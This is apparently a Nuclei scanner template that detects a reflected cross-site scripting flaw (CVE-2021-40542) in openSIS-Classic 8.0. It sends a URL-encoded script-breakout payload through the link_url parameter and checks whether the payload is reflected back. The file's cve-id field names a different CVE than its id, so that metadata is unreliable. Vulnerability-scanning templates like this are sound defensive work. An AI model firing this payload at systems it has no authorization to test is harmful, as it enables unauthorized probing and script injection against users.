38 lines
1.0 KiB
YAML
38 lines
1.0 KiB
YAML
|
id: CVE-2021-40542
|
||
|
|
||
|
info:
|
||
|
name: Opensis-Classic 8.0 Reflected XSS
|
||
|
author: alph4byt3
|
||
|
severity: medium
|
||
|
description: Opensis-Classic Version 8.0 is affected by cross-site scripting (XSS). An unauthenticated user can inject and execute JavaScript code through the link_url parameter in Ajax_url_encode.php.
|
||
|
reference:
|
||
|
- https://github.com/OS4ED/openSIS-Classic/issues/189
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-40542
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
||
|
cvss-score: 6.10
|
||
|
cve-id: CVE-2021-38704
|
||
|
cwe-id: CWE-79
|
||
|
tags: xss,cve,cve2021,opensis
|
||
|
|
||
|
requests:
|
||
|
- method: GET
|
||
|
path:
|
||
|
- '{{BaseURL}}/Ajax_url_encode.php?link_url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- "</script><script>alert(document.domain)</script>"
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- text/html
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|